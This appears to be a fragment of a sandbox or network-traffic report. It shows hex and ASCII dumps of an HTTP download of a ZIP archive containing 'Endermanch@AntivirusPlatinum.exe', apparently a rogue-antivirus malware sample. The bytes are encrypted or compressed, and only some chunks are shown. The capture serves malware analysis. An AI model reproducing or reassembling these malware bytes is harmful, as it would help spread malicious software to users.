                                                                                                                                                2022-09-29 12:51:32 UTC8982INData Raw: 50 4b 03 04 14 00 01 00 08 00 c3 50 3e 3c b9 dd 88 28 ca ed 0a 00 85 8f 0b 00 20 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 74 69 76 69 72 75 73 50 6c 61 74 69 6e 75 6d 2e 65 78 65 23 1e 4a 14 b1 c4 33 c0 bf 0b ce 01 66 9f a5 a5 fa 94 f3 86 ac 9e 88 9a 72 b7 c5 19 87 bb cc 9c ad 47 32 5b 58 17 8d f5 34 86 d9 16 0f 1c 15 31 7c f1 f6 a3 28 84 c7 dc a1 f4 c8 8e 5a 47 34 b7 d2 b8 58 d0 bd f6 1b 49 18 ba 76 bd e0 c6 eb d6 88 07 41 61 a6 35 34 e4 79 45 10 d7 8c b1 11 4d 68 47 d2 c1 27 14 da 92 65 60 d5 ea 14 a7 93 d9 26 ca 0b ef 17 54 58 41 5c c0 93 12 f1 e2 1b c2 d6 22 7b 35 0e 1d 96 da 55 71 44 a7 69 e1 48 a3 86 1e 19 14 ce cb 01 66 c0 fa c6 d4 f4 c3 8a 40 79 22 00 7d 7b 9e fe b1 e5 df 95 75 bf 90 e9 ea 8d 0d 25 96 56 2f 74 1f d9 2b df 87 3d f2 83 9f 41
                                                                                                                                                Data Ascii: PKP><( Endermanch@AntivirusPlatinum.exe#J3frG2[X41|(ZG4XIvAa54yEMhG'e`&TXA\"{5UqDiHf@y"}{u%V/t+=A
                                                                                                                                                2022-09-29 12:51:32 UTC8984INData Raw: d6 91 16 40 38 9a 03 50 65 14 d6 f4 31 a6 4f 62 26 3a 38 d4 6a 23 a8 b9 3f 34 c1 e5 aa 78 5c a6 2b 5e d3 1f 5f c6 e2 2a 02 35 de be 8e b6 2d bc 4b 18 21 9a b6 cc 94 e8 c9 8e 16 d7 f8 89 e3 5b 7a 98 34 6c 90 b5 af 54 91 64 d2 90 d9 c5 0d 09 e0 35 05 89 27 e9 c1 0a 5e ed 49 b6 6d 41 51 c2 ce e5 25 e9 3c 37 9e c7 3b 08 cd d5 4c c7 4c d1 eb c5 61 72 2a c4 d7 67 f1 1f 29 3f a8 7f 25 6b 6c 3e 42 f7 37 b1 49 90 88 a4 59 ca 48 10 60 08 fa 2b 61 43 dc 06 e7 e9 18 6d e3 04 1a 7c 2c ab 87 79 b6 62 98 82 b2 e8 85 ad 55 65 d9 67 05 a6 9a 59 53 70 4b 03 41 47 69 c3 39 97 c0 de 70 fd eb 76 ec 99 f0 c1 32 7a d8 33 f7 1d 42 76 2d 3c 34 e9 62 b3 24 db 98 ec f1 9d c7 1e be d0 96 d8 6b 31 59 6a e8 90 70 10 8a e9 33 50 9d f8 05 a9 99 bf 99 2d 97 c0 1e f9 3c 07 19 fb e9 c9 2d
                                                                                                                                                Data Ascii: @8Pe1Ob&:8j#?4x\+^_*5-K![z4lTd5'^ImAQ%<7;LLar*g)?%kl>B7IYH`+aCm|,ybUegYSpKAGi9pv2z3Bv-<4b$k1Yjp3P-<-
                                                                                                                                                2022-09-29 12:51:32 UTC8985INData Raw: 92 ed 66 93 ab 89 19 02 28 4e 67 0c 1d 58 a5 52 79 d8 ba 75 1b fd 3c 8d b8 70 ce a9 04 c9 fd 91 a4 05 21 bd c5 6c f1 67 56 c4 17 b5 6b 73 26 7e b8 26 13 00 d3 75 79 da cc e4 d4 a1 9e c7 6e 3e 6b 96 e8 19 f4 b1 3f 0b 94 24 60 98 c1 fd 93 22 b8 f4 00 29 c1 71 d7 4f 5d 78 ca c9 b5 53 9f 7d 56 fd a8 ca ff 1e 46 dc b5 48 22 80 f4 68 ef f1 32 b4 61 fd ca 0c 46 8b c5 a5 1b 17 42 df 18 2f 14 f2 6b 5c ac 68 3e 41 fc 46 7d a3 f1 a5 56 3d 7c e4 e5 e8 45 88 16 04 d6 ac d2 40 7e 2d 44 d7 4e 17 9a 67 62 2d a7 1a 98 64 17 82 85 4d 5d 18 41 46 a4 1c 12 44 b9 89 d4 41 19 b6 89 7e c4 40 22 b4 57 f0 79 0d c9 ff 22 d0 06 6e 67 a1 41 93 58 4a d7 83 d5 78 94 bc fe f6 d8 ee 11 63 f4 89 93 d8 53 99 b9 8a 5f c1 6c 93 bd 0b e2 25 3a 6a c8 a0 77 f4 1f b6 71 ff be cd fc 40 d7 12 9b
                                                                                                                                                Data Ascii: f(NgXRyu<p!lgVks&~&uyn>k?$`")qO]xS}VFH"h2aFB/k\h>AF}V=|E@~-DNgb-dM]AFDA~@"Wy"ngAXJxcS_l%:jwq@
                                                                                                                                                2022-09-29 12:51:32 UTC8987INData Raw: 6d 56 f9 64 2a e2 2c 0d 16 dc 2e 0d ac bd 2c 69 ca 32 8b 32 bd c2 0a 88 31 ec 3d 80 38 4d 33 d1 b8 6d 73 75 61 a2 40 db 4f a0 fe e9 63 e8 67 3a f2 9f bd ae 1b f0 8b 9c ee ef a6 4e 87 c0 2d 78 d6 5c 99 f8 8f b9 28 bd 49 f2 c2 61 e3 8c 26 79 42 49 d5 60 06 25 a1 9b a2 da c9 67 72 1f 1c f0 c9 b9 13 ba 89 2d 93 1d 5f 70 fd 89 c0 ca b1 94 0f 54 b4 92 df 3a a5 ab 7f 82 7e d8 cb 7e 14 40 a0 91 a6 3d 2c 40 d4 f3 e7 ed 7c d9 7e d7 cd 62 e6 9a 77 b6 eb b9 ac d9 4b 2e 33 42 1b ba ea c5 28 67 38 ce be a9 54 84 72 50 69 d8 b3 63 61 c4 b2 83 2c a1 5b ce 1b df e8 da 48 a7 79 a6 05 4f 9f c0 34 76 1b 13 5f 0d 21 4f db 32 94 bc de 8d a1 70 63 45 b4 ea 5b e1 26 84 df 37 a0 33 d3 5d 31 3b 80 29 1d 38 ba 29 3c cc 01 fe 29 9a ec b1 ab f3 50 3c 86 66 f7 34 1d 8e 34 74 43 e9 0d
                                                                                                                                                Data Ascii: mVd*,.,i221=8M3msua@Ocg:N-x\(Ia&yBI`%gr-_pT:~~@=,@|~bwK.3B(g8TrPica,[HyO4v_!O2pcE[&73]1;)8)<)P<f44tC
                                                                                                                                                2022-09-29 12:51:32 UTC8988INData Raw: 70 9a 0a 7a c1 27 30 25 23 a4 78 2a b6 90 60 7d b0 2c 06 71 5c a7 a3 84 6d db ec bd 0f 71 f1 7f 1c da 59 1e 42 a5 26 89 02 80 bc 29 de a2 33 5b bf 33 02 de 53 4f 5a 19 f3 94 01 a5 ed 70 c5 1b f8 1d 93 8b 0c b8 8f b0 55 c1 40 bd f0 9a cc 5c 57 ea 01 b4 2c 09 3c ba df 1a 8c a3 b7 30 cf 9b 2f 14 68 46 24 6e 26 91 5c d2 e1 4c ab e3 aa 6f a3 e8 fa a6 2f 72 bf 86 d7 6c 1f 16 10 af d4 ad f2 33 23 c8 87 93 75 a5 7c af af d0 31 0f 6b 04 4f 73 3f 9f 9d 05 0a e9 08 ba 36 cc c4 ac 08 39 4b 80 7a e3 aa 84 12 36 65 37 ef 74 75 de 8b cb 43 16 ef e1 79 e1 d8 2b a5 57 c4 c4 36 a3 f3 2c 52 ce c0 f1 a4 45 95 c5 61 8d de b1 67 1c 60 6c d0 4e 3c e0 e7 52 6f 6d 3f cc 07 ab fe 49 f1 94 d9 f2 50 02 e1 4a 84 1f f2 28 8d 27 03 2e 31 ad eb 44 2c 56 70 24 75 1d 32 6c ff a4 76 4e dd
                                                                                                                                                Data Ascii: pz'0%#x*`},q\mqYB&)3[3SOZpU@\W,<0/hF$n&\Lo/rl3#u|1kOs?69Kz6e7tuCy+W6,REag`lN<Rom?IPJ('.1D,Vp$u2lvN
                                                                                                                                                2022-09-29 12:51:32 UTC8989INData Raw: 57 10 83 0b 76 f9 4a 3f df 92 8b a1 fa 0e cb af 26 23 9a 9a 01 03 23 a5 c1 8c 89 ca e1 4e 51 e3 b0 92 60 dd cf 23 2b 3a 58 21 7b 53 b0 30 b9 69 56 c9 72 e6 91 32 4f 11 42 f6 18 79 15 5a b7 f4 90 62 bf 40 98 fe ff 32 d7 58 43 a5 16 b4 c5 d4 1e 45 d0 0d 55 e3 90 3a f1 4b be e8 5c 76 24 86 cb 5d 59 32 92 d7 55 ae a8 d2 ee 84 4e 00 1a 90 11 99 45 63 95 b7 2d 70 83 1e 0d af 70 fe 4b 79 70 5b a4 27 5f 81 59 69 55 11 cb c9 06 77 47 04 cd 31 8b 67 14 f5 4e dc 27 54 7a 91 12 17 ea a9 e9 da 8f c8 70 dd d3 b5 f1 a6 11 24 a7 37 0d 9d e8 9a df ea 0f d4 20 28 a9 c6 75 0a 3d 4f 9d 79 84 d0 fc 73 2a f8 a7 39 46 0e a4 26 65 8b e1 89 44 b3 5e 10 ad bc 12 7e ee f8 e2 ba 74 70 36 73 2c fe 98 4b 85 e0 67 4f 3b d4 e7 1d a2 02 22 16 0c d4 86 ce a1 f7 33 0a 6c 2c 64 0a 8e 72 4b
                                                                                                                                                Data Ascii: WvJ?&##NQ`#+:X!{S0iVr2OByZb@2XCEU:K\v$]Y2UNEc-ppKyp['_YiUwG1gN'Tzp$7 (u=Oys*9F&eD^~tp6s,KgO;"3l,drK
                                                                                                                                                2022-09-29 12:51:32 UTC8991INData Raw: a7 74 d9 e0 c2 6d c2 cb 5a d5 9a ce c9 65 94 1e 86 2e e5 f7 49 90 5a c5 65 1c fa 44 8b f3 03 b1 d9 33 07 ab 60 93 88 fe 11 4f 43 95 6b e1 61 8a 6c 65 52 61 54 dd 9f 11 b3 3c d7 dd 34 08 3b bd 2b 8b ef eb 5d de 88 a1 09 53 82 66 a8 22 24 46 e7 f4 df 0f 5a 5f 10 8f 8a d2 00 de 88 02 2f 6f f8 a7 a0 2a 9b 0d 1a 28 cb 66 b6 4b 4e 23 e8 0d b3 f8 83 24 87 c8 26 20 42 3e 75 9c d4 1f 44 32 b6 15 c2 45 40 c7 fa 89 c0 80 19 bc f2 c2 f1 e0 6f 9d 3f 1a df 6a 1d 7f f5 cb 03 24 a1 21 57 1f 89 ae bf 65 fa 95 16 0c 8f b6 63 3a a0 11 70 1b 61 7d 40 4e a1 dc fb 19 19 8a 88 c1 b5 dc 26 c6 2a ad 7b 5c ee 9f e0 12 f4 12 db 17 e1 a7 cd 11 a1 7b 10 84 87 35 ad 9f 56 d0 53 42 40 00 05 3b ff 62 6c 21 2e 7e a7 d3 8c 67 69 f3 47 5d 1a c2 23 d9 99 10 83 7f 6a 3d a5 cd 4a 89 ed cb 2d
                                                                                                                                                Data Ascii: tmZe.IZeD3`OCkaleRaT<4;+]Sf"$FZ_/o*(fKN#$& B>uD2E@o?j$!Wec:pa}@N&*{\{5VSB@;bl!.~giG]#j=J-
                                                                                                                                                2022-09-29 12:51:32 UTC8992INData Raw: 0c 78 d4 31 d8 3a 93 a4 26 af f4 0e 1b f7 ec d2 c1 0a 47 63 f5 4d 2f f4 75 d6 a3 a7 f0 7c 62 e9 10 1c a2 fe f9 2f 1c fb 70 0f 60 36 9d 90 80 4d 16 9d 60 14 f2 b8 e9 22 a3 9d 1d 09 64 37 65 6e 69 47 ab 2c 18 9d 1e c6 e3 f6 dd 6c 8b df 83 24 cd 51 10 9d 9b a1 9e 4e f2 dd ab b4 a3 21 58 40 32 8f c9 45 c4 09 ea 0c 9f ee 6a 40 78 e8 81 ed f7 f5 c4 e6 fe 35 15 f1 10 ec 30 58 ef 43 12 ca 28 b8 15 f7 16 8f c1 23 e5 ae f5 27 87 b9 ca 9b 84 ef cf 44 6d 85 55 05 bb 22 88 92 22 d2 3e b6 1f 84 ec 66 5a b7 18 23 c1 c4 24 e7 1c b3 56 89 1b 2d 94 ee c9 df 7e c1 fd de 91 a8 de c1 d0 ac ae a6 93 9e 89 ce e4 28 6a 53 7c 4c 2c 2c a4 e5 91 e4 29 9d 3c e1 56 7a 35 be 18 ec 15 fa 87 2a 2e e0 d4 31 68 47 c8 72 3b d0 55 a1 69 0d cb 16 4e ce d6 07 61 0a dc 9a 2f aa 2b 3e 67 8e 6a
                                                                                                                                                Data Ascii: x1:&GcM/u|b/p`6M`"d7eniG,l$QN!X@2Ej@x50XC(#'DmU"">fZ#$V-~(jS|L,,)<Vz5*.1hGr;UiNa/+>gj
                                                                                                                                                2022-09-29 12:51:32 UTC8993INData Raw: 42 17 b4 01 79 98 99 81 50 b3 a0 cf bb ff 8f ef 78 eb 24 9d 5b cf 92 82 0d 41 f8 e9 89 26 05 21 3e a9 de 1c 26 dc 61 0d a1 d6 43 31 aa 74 00 c8 38 da 3f d8 ea a0 38 97 d2 c0 82 36 3e d3 90 48 15 5f 22 1d 16 6a 4e a2 d5 bc 92 30 4d 8e 41 0f 56 2d 62 f5 b5 47 76 69 4a 14 ba 4a 7f c0 bf fe 11 77 38 e6 8d 40 d8 36 a9 51 7c 50 24 69 95 a5 d3 6f 99 66 2c 22 af 3e 5c 7c b2 77 05 ef 08 b1 34 aa 5e 50 2c 6a c7 39 52 a1 b0 6e 3e 86 89 7b 26 de 4b 20 34 1c f9 27 4d e9 b1 60 cb 7d c3 aa b3 93 e3 5c aa 91 4a be 82 df 87 96 bc 21 28 c9 40 4a 4c 40 11 fd ad 7e 8f 96 df a5 c3 c7 be 3f 0d 84 61 ea 55 f5 54 f8 a2 f9 14 80 f8 e2 e4 b6 6f 42 36 45 7d 82 35 76 84 b2 02 88 a1 94 70 af 75 43 cc 8d e8 29 86 ee 4b c7 2c 61 5b d2 f9 22 87 23 9d 83 37 e9 91 aa ed bf 18 55 61 07 31
                                                                                                                                                Data Ascii: ByPx$[A&!>&aC1t8?86>H_"jN0MAV-bGviJJw8@6Q|P$iof,">\|w4^P,j9Rn>{&K 4'M`}\J!(@JL@~?aUToB6E}5vpuC)K,a["#7Ua1
                                                                                                                                                2022-09-29 12:51:32 UTC8995INData Raw: 89 81 53 62 0c 4d 39 a7 fd c9 ee 61 7d b9 52 68 8d ec 28 54 3f 55 03 0e c7 b1 21 75 4f a4 0f 36 04 99 61 af 70 42 6e fd c3 0c 97 02 21 04 4a bf 0c 9e aa 3c cb 22 16 14 c6 8d ed e5 1d d2 4e 2c 18 23 d6 24 13 4c 1f a9 d9 22 6b 19 24 5a 16 df a2 b4 04 cf b1 f2 12 d1 66 fa b9 be c1 81 36 58 44 98 62 ec 72 83 6a cd bd f3 c1 b1 9d 21 36 97 1e c8 4d 4e e2 7c 81 a9 d4 27 63 03 d4 33 01 2f ab 29 d2 75 cc 32 03 c0 07 21 bf 62 ff b7 16 0b 8b c4 47 cc f4 84 9a 04 1e 50 35 2f a2 7d 36 9e 80 ac e9 e2 ab f4 ca 2e c8 69 e0 ce ad 23 2e 5f d6 44 ae bb 09 24 80 73 06 49 86 bd f1 08 30 60 21 4e 6e 0c b1 03 b7 58 a6 2c 06 8c e7 f6 68 ef 54 dd f7 35 61 55 9f cd 55 ad 27 36 08 02 c5 77 88 23 6f 33 f1 00 ec 48 5c 2b 97 5e ff 99 ea be d3 08 e9 ef 94 23 22 5f cc 72 81 4f 74 03 1f
                                                                                                                                                Data Ascii: SbM9a}Rh(T?U!uO6apBn!J<"N,#$L"k$Zf6XDbrj!6MN|'c3/)u2!bGP5/}6.i#._D$sI0`!NnX,hT5aUU'6w#o3H\+^#"_rOt
                                                                                                                                                2022-09-29 12:51:32 UTC8996INData Raw: 14 b0 db 98 6d e2 9c 79 a5 c4 8d ee 34 83 7e 34 f5 d2 d4 3a ff b7 09 ae 87 61 16 0b a4 50 84 a0 81 3e f5 a6 03 cf 3e cc f4 f3 74 cf 04 fe 4f 9c 45 5a 86 52 a6 cf 29 9c 01 84 a2 03 f0 ff 50 3c d4 a9 0b b9 a3 80 05 2b 95 4b a8 2a 5b 81 81 3b 32 50 1a 8d 21 6d 4c ab c6 12 ca ee f8 88 dd 5d 43 74 2b 76 a7 50 9e 5d ce ec 2d 07 2b 90 93 7a 9e c0 c9 bf dc 0f c0 07 41 4f 0e dc 35 8a 40 9a 02 37 a7 63 d3 55 d9 0c e9 4b a2 78 80 99 0e 07 10 1f c6 34 bb 7e a0 86 ef 47 c8 36 10 e7 b4 a0 77 62 bc ad 6e 45 db e2 1e 39 7e 30 87 8d 8a 08 f4 7d 13 37 a0 c2 6d 22 8c 4a 76 a4 75 fb 67 c4 c5 da e2 d0 59 b6 da ba 72 c5 02 95 e4 67 32 39 fa 61 54 6b bf da 12 c5 27 be 38 5b 7f 4f 32 a1 1e f8 bf 6d c9 63 86 f5 10 88 f0 02 bc ed 70 7d 3d 87 fa 52 60 4e a6 21 0b 5b e9 e0 45 1c 40
                                                                                                                                                Data Ascii: my4~4:aP>>tOEZR)P<+K*[;2P!mL]Ct+vP]-+zAO5@7cUKx4~G6wbnE9~0}7m"JvugYrg29aTk'8[O2mcp}=R`N![E@
                                                                                                                                                2022-09-29 12:51:32 UTC8997INData Raw: 5a 42 29 bf 84 e7 c5 79 c8 c7 d5 d7 57 14 41 ca 20 f1 9f dd bd ee 15 d9 12 17 18 fc 54 14 16 78 e8 76 7f 3b 10 84 9b b6 d0 e6 cc 48 bf 70 d9 3a 2f ab 76 d2 ca 08 7e b5 ef f8 e8 77 41 a3 79 f7 82 e9 14 02 9f 1c e7 ad dc 83 d8 a9 a1 27 0b 88 92 da 84 d3 4a 89 aa 42 89 34 ff e8 0e 69 c9 c5 fb c8 48 a3 1f b7 b6 c3 55 7d d8 aa 3c d8 d5 2a 02 19 ca 6f 2a ab db 99 76 65 ee b0 e7 46 ef 29 9c 28 a3 8c 1c ed a4 ad 4b f7 40 07 95 5c 26 61 bd 74 ed 13 a7 3c 49 86 f8 c7 09 2e 6e bf 57 1f 34 4d 7c 2f 24 ed 86 fa da bb 47 09 7d 0d a6 e5 2c 96 74 8d b9 6e 27 45 18 73 f7 00 55 8d bb a8 ba 53 36 b8 94 81 d9 d5 23 16 dc cb 48 a5 4c f5 a7 4a 26 60 28 c2 9e 05 3b 15 38 ba 96 91 77 cb f1 29 26 3c 1f eb 3c f9 6d 75 6b 87 71 20 19 74 ee a9 67 31 71 da a6 42 50 31 5a be 31 2a 5b
                                                                                                                                                Data Ascii: ZB)yWA Txv;Hp:/v~wAy'JB4iHU}<*o*veF)(K@\&at<I.nW4M|/$G},tn'EsUS6#HLJ&`(;8w)&<<mukq tg1qBP1Z1*[
                                                                                                                                                2022-09-29 12:51:32 UTC8998INData Raw: 17 8d ed 36 ad 37 70 da 8a f7 82 c1 01 6c 3e 98 85 2a 19 ba 58 4c 08 07 9f 45 07 bc b2 65 77 57 1a ac ef 29 58 32 75 b9 c5 64 d8 5f 90 c0 8e 05 2b 06 b3 3b e2 4f 27 2e 9c ee 30 33 1b fa 09 6c e6 3c 0b 58 d3 b4 9a 92 5a cf 39 b7 3c 40 42 e1 92 8c 49 41 2e 17 ba c9 9f 9c 24 c9 9b a1 a6 e9 e3 78 60 14 41 51 bb 72 e6 d3 00 65 07 19 c4 b8 ba a7 64 4e 4c c0 54 e1 8e b9 5d 69 db 82 29 85 2c 0c 13 67 40 30 7d 38 14 e7 cd cb 7a 82 84 14 e1 ae 4a 92 5c ce 60 05 cb 06 ec 9f 5d 8a cd 30 53 4b 36 77 0f c7 b7 73 5a ef 5a cb bb bb b2 40 0b 8b 71 84 7d 36 f6 c4 78 f3 cc 14 83 d8 95 21 63 79 81 20 8e de 7f 30 6f cc 08 e9 80 55 45 d9 0f 2d 61 d7 ed fb b4 92 85 7e e9 21 28 4f 3b 16 54 b1 f6 29 24 17 7f 19 dd 8f 28 86 ec 0e ba 9f c8 56 ae 56 a5 96 2e ee 12 f8 c5 47 d4 07 1d
                                                                                                                                                Data Ascii: 67pl>*XLEewW)X2ud_+;O'.03l<XZ9<@BIA.$x`AQredNLT]i),g@0}8zJ\`]0SK6wsZZ@q}6x!cy 0oUE-a~!(O;T)$(VV.G
                                                                                                                                                2022-09-29 12:51:32 UTC9014INData Raw: 27 9a 24 38 1d 78 76 bc 68 54 b8 04 6a 1d 3b 46 21 ab c5 84 6c 3f 35 20 02 3d 9f c7 f2 ab bf 06 23 80 48 e6 b9 70 29 9d bb 90 d4 f3 8b 59 ac 5d 19 47 69 0f 6e fd 6a 72 9c bb 25 97 0c 64 f7 89 e8 bf 10 33 ae c2 af d7 11 66 e7 97 4a 02 e3 da f1 f0 14 92 7e 47 8e 4a f6 6e 9b d2 0a 13 66 72 85 39 05 3e b5 3e 67 91 63 0c 8b 87 1a 73 b4 47 17 63 5e b7 5f 38 32 6e 1e da 4c 97 d3 ab bc 1a b1 1f 25 58 d5 05 72 27 c3 49 73 96 89 83 5b 1a 79 fe a7 e6 05 d6 69 10 22 48 23 2c b0 4c cf 48 0d 43 46 d5 c0 66 da 60 fd e7 32 39 f5 24 e4 8f e3 9e 98 c7 9f 59 17 79 8c b2 df e9 3c 56 46 2f e7 84 f6 ac ef c6 b2 0d 74 6b 6a 55 7b 3f e7 7a fb 51 f5 2c e3 53 35 82 5c 0b 61 6a 99 16 76 00 8a 52 ca a5 c3 95 2f de f7 22 93 83 94 17 93 3b 2c 1a ce e5 c9 17 e3 77 ad 81 2e d8 d6 77 a3
                                                                                                                                                Data Ascii: '$8xvhTj;F!l?5 =#Hp)Y]Ginjr%d3fJ~GJnfr9>>gcsGc^_82nL%Xr'Is[yi"H#,LHCFf`29$Yy<VF/tkjU{?zQ,S5\ajvR/";,w.w
                                                                                                                                                2022-09-29 12:51:32 UTC9030INData Raw: d1 41 91 7e 4f d7 f0 4c c4 23 2d 0a 77 0e 82 f2 72 58 e7 19 c1 ef 3f de 10 b7 d3 3f 1c a4 1a c5 51 03 19 e8 4c 2f a2 29 1f 0e 8c 56 5e 92 5f 0f f7 6b cd 1d ad f1 8a 82 f2 66 2c 08 ca 70 ca 84 e4 16 fe 4d d2 41 d1 06 f8 ae bd 96 5d ec 99 55 86 aa b3 b5 41 6f 15 43 c9 cd 40 76 fe 84 e9 92 07 eb f6 25 ee 3e 26 5e 5c b9 d1 ad 01 e9 20 aa 80 e3 02 1a c8 bc 96 8b d1 9a c0 93 8d 3e c6 fe 3f c0 57 27 2b 34 27 56 06 12 fd 83 d8 88 41 d9 b3 88 5d 92 dd 07 0a be b1 58 43 d4 11 4b 11 69 f7 c5 70 c7 cc 52 d2 95 c3 d0 59 5d 99 7e d0 03 2a 5a 11 d6 c9 cb be 73 d0 cb 4a a8 30 51 c5 46 18 ef fe 3d de e0 6b fd 72 5d ef a9 fc 5c b6 6d 45 65 a7 67 40 fd 7d b9 d9 be fb 6d b5 df 6b 2b 49 f8 99 2e a4 f5 f3 34 ab a6 2d 83 43 95 72 4c 7f 3e 45 fd 8a 82 2b b5 86 3e 82 78 95 69 91
                                                                                                                                                Data Ascii: A~OL#-wrX??QL/)V^_kf,pMA]UAoC@v%>&^\ >?W'+4'VA]XCKipRY]~*ZsJ0QF=kr]\mEeg@}mk+I.4-CrL>E+>xi
                                                                                                                                                2022-09-29 12:51:32 UTC9046INData Raw: 87 97 de 34 a3 82 a5 9c 0d b7 b8 d5 5f a7 50 94 07 98 cc 6f c9 6b e6 92 49 3c ec 48 63 f2 d1 de df bc 19 9e 88 8f 8e 73 e8 bd b2 25 83 52 95 58 e3 e9 45 fa a4 f7 26 53 94 7f 3d 03 65 6d e0 bb cb 94 de 40 a9 16 b0 92 e9 86 60 51 d5 92 df f4 40 3b 3c 86 cb 07 52 a9 19 d8 39 8e 67 8e 28 67 00 47 03 93 65 b8 aa b6 97 54 da ff 75 44 6f 7a 02 43 11 5f 42 95 2a c2 1f 44 ad b7 37 53 d9 2f 10 e4 29 d6 cd 80 8c 33 51 22 01 8c 3c f9 42 e0 b5 68 ea f7 62 19 80 34 2b aa a9 ed 64 f7 eb d5 5a 9b 0c 0e 60 0b 90 7f d5 75 f5 d8 05 eb 26 fc 4a 37 3c 93 c1 c4 74 56 b6 09 36 b0 7a 18 ee b2 79 f6 0a 79 cd d6 28 97 54 66 29 29 2d cc 3c f2 01 93 fd 01 67 4a 7c ff 82 6d ee b2 01 49 42 99 78 92 33 b6 63 bd 69 c5 78 64 01 87 9f 10 f1 8d dd 41 0c fb fc a3 af 55 ab db 4e 55 25 aa 1c
                                                                                                                                                Data Ascii: 4_PokI<Hcs%RXE&S=em@`Q@;<R9g(gGeTuDozC_B*D7S/)3Q"<Bhb4+dZ`u&J7<tV6zyy(Tf))-<gJ|mIBx3cixdAUNU%
                                                                                                                                                2022-09-29 12:51:32 UTC9062INData Raw: fa 64 41 d4 d7 e3 98 b0 5d 9d 2b 31 6b 43 f0 b5 a8 f1 4d 5a 26 41 28 b4 dd d3 f9 c0 bb f6 d1 5a 82 69 e3 1d e8 be a2 a5 42 b8 2c 64 77 2c 22 b4 8d 7a 78 db 2a b7 f0 4c 0d 11 6e 3c fc a2 f3 68 5f 53 67 e6 3c 10 5b cc 14 3b a5 9f d0 5c 67 d4 e9 c1 d9 47 69 5a 8c f3 0f a3 f1 1d 01 a2 ed 01 97 07 26 d5 0d 6f ee dd 8b a0 79 0f 91 ca 58 a1 1b 96 3d 8d b6 6c 28 95 de 63 a0 2b 10 05 a4 39 a2 e7 8a 58 6a 31 0c 3d 6f 10 cc 54 3f e3 d0 e9 b7 b3 dc 02 09 89 f2 94 24 62 f2 16 43 42 a3 3a e1 43 a5 ea 33 6c ae 9f 60 f2 1e 61 5d bd fc ae 22 20 16 ed 75 d0 3a af da 0f 0a ea 82 6d d9 e6 c7 f7 f9 49 ff 77 0d 1d 3e b9 37 cf 73 51 f3 77 1e 4b 8e da f3 d5 98 92 f4 54 58 71 e2 dd fd 69 93 3a ca 3c 52 aa 83 3c fa 60 1c 02 77 bd 89 36 de e9 e8 2b 51 75 01 a6 33 30 6d e5 94 bf 9c
                                                                                                                                                Data Ascii: dA]+1kCMZ&A(ZiB,dw,"zx*Ln<h_Sg<[;\gGiZ&oyX=l(c+9Xj1=oT?$bCB:C3l`a]" u:mIw>7sQwKTXqi:<R<`w6+Qu30m
                                                                                                                                                2022-09-29 12:51:32 UTC9078INData Raw: 3b 36 40 42 ca be 46 f7 92 01 50 10 1b a2 b9 0e 9c 67 31 03 2f 92 df b6 c0 23 b0 ff 0d 10 11 f2 47 8b bc 03 c5 20 b4 1e 2e 58 75 01 a3 23 3e a3 69 27 75 35 c3 06 cc e1 e0 33 70 bc a8 3c f5 9c c2 00 31 bf 08 21 21 2b 2a 5a 10 8f 7b b8 89 92 a4 81 aa 75 6d c3 35 28 d1 e2 4e 2a 5d f9 c8 23 47 e1 72 68 59 f1 d0 f5 e3 91 24 04 0a 03 37 7a b3 3b ac ec 1a 8b 12 5a ae 80 62 7e 34 b6 35 fd 75 10 17 f7 9c 4c 6c 87 26 62 81 5f 60 21 e9 ed 71 5f 0f 59 c8 93 33 9f 6b 8c 3b b9 b7 e7 b1 57 35 82 6f 36 27 1d 27 82 ea 89 20 80 b3 12 3a eb 6e b9 c5 b9 46 bc 40 9e bd b6 b7 67 14 34 e8 72 d0 e1 95 e0 91 39 b2 23 d5 93 00 24 5c e4 83 49 a6 c9 8e e6 58 3b be 9b 12 6d 9d 5c db 49 45 46 b7 16 46 e2 f0 bd df f1 c3 52 68 43 7f f3 a3 0f a1 9a 61 e6 08 a7 29 98 2a 58 03 3d 84 16 ab
                                                                                                                                                Data Ascii: ;6@BFPg1/#G .Xu#>i'u53p<1!!+*Z{um5(N*]#GrhY$7z;Zb~45uLl&b_`!q_Y3k;W5o6'' :nF@g4r9#$\IX;m\IEFFRhCa)*X=
                                                                                                                                                2022-09-29 12:51:32 UTC9094INData Raw: c9 a8 4b 54 92 a5 e4 9a f9 c8 52 89 82 57 4c 46 12 2a 49 c4 f2 66 29 84 e5 0b 1b b8 c2 85 ea 0d e7 38 07 07 4b eb 0d e0 79 9e af 55 31 59 d4 64 0d fc 29 94 1f 3a 87 54 22 af 51 69 d5 7b b1 07 14 cc b2 6c ab 44 db ec 59 92 fb fb f7 78 e2 17 72 39 b1 6b 0a 4d 50 ab 7d 9a 22 88 8e 93 0c 98 63 20 37 0e 0d ca 45 48 b3 4d 75 a5 82 3e 30 da f4 c9 a6 b6 93 67 95 36 65 e3 d6 54 14 d4 83 29 f5 d4 75 34 2c a0 c2 ba 11 ea 15 0d ee d4 e2 2c 50 c3 4f e6 90 d0 57 57 4f d7 d8 8d d7 02 20 0b 47 a4 32 03 68 ea a5 a3 e0 8b df 94 b8 b6 73 70 76 a1 de cf 2e 42 81 45 10 cb ca 39 68 58 0e 53 32 8c 99 d8 14 9c f2 cd 02 92 b6 9c fb 1f fe f1 0c 79 ab ff 07 ef 28 c2 a2 78 e4 0d 14 b4 ab b1 cb 99 9b 89 35 41 25 cd da 63 d6 d1 02 fc 5f df 86 be 19 dd 93 e4 b5 51 ae e8 71 b9 0b 23 52
                                                                                                                                                Data Ascii: KTRWLF*If)8KyU1Yd):T"Qi{lDYxr9kMP}"c 7EHMu>0g6eT)u4,,POWWO G2hspv.BE9hXS2y(x5A%c_Qq#R
